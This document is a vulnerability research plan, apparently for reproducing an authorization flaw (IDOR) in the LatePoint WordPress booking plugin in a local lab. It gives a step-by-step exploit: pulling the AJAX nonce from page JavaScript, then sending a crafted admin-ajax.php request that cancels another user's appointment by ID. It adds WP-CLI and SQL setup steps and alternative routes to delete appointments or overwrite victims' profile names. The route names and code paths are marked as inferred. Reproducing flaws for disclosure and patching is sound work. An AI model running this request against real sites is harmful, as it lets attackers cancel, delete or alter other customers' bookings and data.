Research Plan: CVE-2026-32533 - LatePoint Insecure Direct Object Reference (IDOR)

1. Vulnerability Summary

The LatePoint – Calendar Booking Plugin for Appointments and Events (up to 5.2.6) is vulnerable to an Insecure Direct Object Reference (IDOR). The vulnerability exists in the plugin's handling of specific AJAX routes where user-controlled identifiers (keys/IDs) are processed without verifying that the requesting authenticated user (Subscriber level or higher) has ownership or authorization for the target object.

According to the CVSS vector (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N), the impact is limited to Integrity (Low) with no Confidentiality impact. This strongly suggests the vulnerability allows an attacker to modify or delete/cancel objects (like appointments or customer metadata) belonging to other users, rather than viewing private data.

2. Attack Vector Analysis

• Endpoint: wp-admin/admin-ajax.php
• AJAX Action: latepoint_route_call (The primary router for the plugin's internal MVC architecture).
• Vulnerable Parameters:
  • route: Likely appointments__cancel or appointments__delete.
  • params[id]: The ID of the appointment to be cancelled/deleted.
• Authentication: Subscriber+ (Customer role in LatePoint).
• Preconditions:
  • Plugin must be active.
  • An appointment belonging to another user (the victim) must exist.
  • The attacker must know or guess the integer ID of the victim's appointment.

3. Code Flow (Inferred)

1. Entry Point: The client sends an AJAX request to admin-ajax.php with action=latepoint_route_call.
2. Routing: The main plugin file (or a router class like LatePoint\Helpers\RouterHelper) receives the request.
3. Action Execution: The router parses the route parameter (e.g., appointments__cancel). This maps to the cancel method in the Appointments controller.
4. The Sink: Inside the controller (e.g., lib/controllers/appointments_controller.php), the code retrieves the appointment object using params['id'].
5. The Flaw: The code checks if the user is logged in (Authentication) but fails to check if the customer_id associated with the fetched appointment matches the current_user_id (Authorization).
6. The Action: The plugin proceeds to update the appointment status to "cancelled" or deletes it from the database.

4. Nonce Acquisition Strategy

LatePoint uses nonces for AJAX requests, typically localized in a JavaScript object.

1. Create a Trigger Page: LatePoint usually enqueues its assets on pages containing the booking button or customer dashboard.
   • Command: wp post create --post_type=page --post_status=publish --post_title="Dashboard" --post_content='[latepoint_customer_dashboard]'
2. Navigate and Extract:
   • Login as a Subscriber (Attacker).
   • Navigate to the created page.
   • LatePoint nonces are often found in the latepoint_helper or latepoint_booking_form_data global JS objects.
   • JS Variable: latepoint_helper.nonce or latepoint_booking_form_data.nonce.
3. Browser Eval:
   • browser_eval("window.latepoint_helper?.nonce")

5. Exploitation Strategy

The goal is to cancel an appointment belonging to another user.

Step 1: Identify Victim Appointment

For the PoC, we will create a Victim user and an appointment for them using WP-CLI. Note the ID of this appointment.

Step 2: Authenticate as Attacker

Login to the WordPress instance as a Subscriber-level user.

Step 3: Perform Unauthorized Cancellation

Send an AJAX request to cancel the victim's appointment.

• URL: http://localhost:8080/wp-admin/admin-ajax.php
• Method: POST
• Headers: Content-Type: application/x-www-form-urlencoded
• Body:

  action=latepoint_route_call
  &route=appointments__cancel
  &latepoint_nonce=<NONCE_OBTAINED_FROM_STEP_4>
  &params[id]=<VICTIM_APPOINTMENT_ID>
  &return_format=json
  

6. Test Data Setup

1. Victim User:
   • wp user create victim victim@example.com --role=subscriber --user_pass=password
2. Attacker User:
   • wp user create attacker attacker@example.com --role=subscriber --user_pass=password
3. LatePoint Setup (Simplified):
   • Ensure at least one Service and one Agent exist (required for appointments).
   • wp latepoint create_service --name="Test Service" (Note: requires actual latepoint CLI or manual DB insertion if CLI is unavailable).
4. Victim Appointment:
   • Create an appointment manually or via WP-CLI/SQL for the victim user.
   • wp db query "INSERT INTO wp_latepoint_appointments (customer_id, service_id, agent_id, start_date, start_time, end_time, status) VALUES (<VICTIM_ID>, 1, 1, '2026-12-25', 600, 660, 'approved')"
   • Identify the ID of this inserted row.

7. Expected Results

• Response: The server returns a JSON success message (e.g., {"status": "success", "message": "Appointment cancelled"}).
• Side Effect: The appointment in the database with the Victim's ID now has a status of cancelled.

8. Verification Steps

1. Check the status of the appointment using WP-CLI:
   • wp db query "SELECT status FROM wp_latepoint_appointments WHERE id = <VICTIM_APPOINTMENT_ID>"
2. Confirm that the status has changed from approved to cancelled.
3. Verify that the Attacker does NOT own this appointment:
   • wp db query "SELECT customer_id FROM wp_latepoint_appointments WHERE id = <VICTIM_APPOINTMENT_ID>" (Should return the Victim's ID, not the Attacker's).

9. Alternative Approaches

If appointments__cancel is properly protected, check other common LatePoint routes for similar IDOR patterns:

• Route: customers__update_profile
  • Payload: params[id]=<VICTIM_CUSTOMER_ID>&params[first_name]=Hacked
  • Check if the Attacker can change the name/email of the Victim customer.
• Route: appointments__delete
  • Similar to cancel, but attempts actual removal.
• Route: activities__get_latest
  • Check if params[customer_id] allows viewing activity logs of other users (unlikely given CVSS "C:N", but worth checking).